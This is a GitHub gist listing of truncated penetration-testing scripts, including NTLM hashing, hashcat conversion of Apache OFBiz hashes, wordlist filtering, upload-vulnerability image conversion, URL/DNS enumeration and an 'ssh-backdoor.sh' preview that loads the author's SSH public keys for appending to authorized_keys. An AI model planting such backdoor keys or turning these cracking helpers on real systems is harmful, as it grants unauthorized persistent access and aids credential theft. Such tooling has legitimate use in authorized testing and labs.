Skip to content

Instantly share code, notes, and snippets.

View Yeeb1's full-sized avatar
💀

Yeeb Yeeb1

💀
View GitHub Profile
@Yeeb1
Yeeb1 / ipconv.py
Created October 22, 2023 15:34
Quick IP Converter
#!/usr/bin/env python3
import sys
import ipaddress
def ip_to_decimal(ip):
return int(ipaddress.ip_address(ip))
def ip_to_octal(ip):
decimal_val = ip_to_decimal(ip)
@Yeeb1
Yeeb1 / ntlm_hasher.py
Created October 27, 2023 07:46
smal script to convert a password to NTLM
#!/usr/bin/env python3
import hashlib
import sys
def compute_ntlm_hash(password):
password = password.encode('utf-16-le')
return hashlib.new('md4', password).hexdigest().lower()
if __name__ == '__main__':
@Yeeb1
Yeeb1 / image_converter.py
Last active November 9, 2023 07:45
small script to convert your favourite image to different filetypes before testing for file upload vulnerabilitites
import os
import argparse
from PIL import Image
def convert_image(input_image_path):
output_dir = os.path.join(os.path.dirname(input_image_path), 'outputs')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with Image.open(input_image_path) as img:
@Yeeb1
Yeeb1 / ofbiz2hashcat.py
Created January 7, 2024 09:39
This script converts Apache OFBiz hashes into a format suitable for cracking with Hashcat (Mode 120)
import argparse
import base64
import binascii
def ofbiz2hashcat(hash_string):
try:
_, hash_type, salt, encoded_hash = hash_string.split('$')
except ValueError:
return "Invalid hash format. Expected format: $HASH_TYPE$salt$encoded_hash"
@Yeeb1
Yeeb1 / quickpass.py
Last active January 11, 2024 17:17
Search keywords in /usr/share/wordlists/rockyou.txt and write found passwords into quickwins.txt. Keywords can be related to box name, service, or username.
#!/usr/bin/env python3
import argparse
import re
def convert_1337(keyword):
leet_translations = {
'a': '[a4@]', 'b': '[b8]', 'c': '[c<({]', 'e': '[e3&]',
'g': '[g9]', 'h': '[h#]', 'i': '[i1!|]', 'l': '[l1|]',
'o': '[o0]', 's': '[s5$]', 't': '[t7+]', 'z': '[z2]',
'u': '[uµ]'
@Yeeb1
Yeeb1 / ssh-backdoor.sh
Last active January 16, 2024 11:00
ssh-backdoor.sh
#!/usr/bin/env bash
today=$(date '+%Y_%m_%d__%H_%M_%S')
DIR="$HOME/.ssh"
FILE="$DIR/authorized_keys"
declare -a KEYS=(
'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJxVi/t1Cm4pc1ZZsvXLWF6ZxWiS/gLLWW63wLZOI9l3 yeeb@yeeb.xyz'
'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC4cW0w7jAp1WiUN4QrVCD0W2IhkZo1Ixqc79PpLoz4zzTj3sSmB3HOk/2XO5v5Dp1oqNkL+DTzhtZAus/A1u0Sa0Ir5Y4OUEq0Kmo4mwanpcpGP5zoEnOGQWvsleM9vPowHXCWTsM7WPUoP34bR8l9sXgVYiQZzWRQqHFp+7nx5te706YV5velZYc1R6tESbawsU6vTphgJfb9KPIowLlz3DHUc/JWvbjnwu57ZKLbmpTbw+YS8b0n2hF941tT95fBcIl05WdZc2C/Nh7+kICyfWlObnmKGYnnrghM8NhKs1aJJ9KX4G0zWafPoePTDJLcALHxGyV27nrl5qghq/lUNBtp+6QR7WtsLUqCMJ+cNCiDyIUpD0WFEpv9Z5olDiRgFFMgeUTSK3aGM1B4OwXWh0WCp0Fs5tWyyI2Nv1hsZyxHEBZ03hjkp3QMnhxPpdp9bHErmSaqdPOJAVDVK7pDAuAgSPi78xwyEzEpBiWneUq3kCASKT0GPecE4fpI891r2RkD85XhPsATYcXn7PVLIID8kBG1dRYTSFSVkXqZii10GO6/vE8311Zhl/ZeuF5iOoRYixsAQEKlTofJsuKfka3G4Hngnq0YxPM8RKxCcFn+TVt+91Dq2j18xcunkYnmZ1WqMcKZSUt0uvEUja6rlevHfEP05AaR6Y0bGgwsVQ== yeeb@yeeb.xyz'
@Yeeb1
Yeeb1 / url-enum.sh
Last active March 19, 2024 14:56
enumerate urls from domains file
#!/bin/bash
COOKIE=''
FILE_PATH=''
OUTPUT_FILE='urls.txt'
usage() {
echo "Usage: $0 -f <domains_file> [-c <cookie>]"
echo " -f Path to the file containing domains."
echo " -c Cookie for session authentication (optional)."
@Yeeb1
Yeeb1 / url-parse-js.sh
Last active January 17, 2024 09:34
parse urls and download js files
#!/bin/bash
COOKIE=''
DOMAINS_FILE=''
URLS_FILE=''
usage() {
echo "Usage: $0 -d <domains_file> -u <urls_file> [-c <cookie>]"
echo " -d Path to the file containing domains."
echo " -u Path to the file containing URLs."
@Yeeb1
Yeeb1 / dns-dump.py
Created January 17, 2024 11:38
dns-dump.py
import argparse
import socket
import json
import dns.resolver
def read_domains(file_path):
with open(file_path, 'r') as file:
return [line.strip() for line in file if line.strip()]
def resolve_domains(domains, dump_dns):
@Yeeb1
Yeeb1 / dns-query.py
Last active January 17, 2024 12:11
its dig ok?
import argparse
import dns.resolver
def dump_all_dns_records(domain):
record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
all_records = {}
for record_type in record_types:
try:
answers = dns.resolver.resolve(domain, record_type, raise_on_no_answer=False)
if answers.rrset is not None: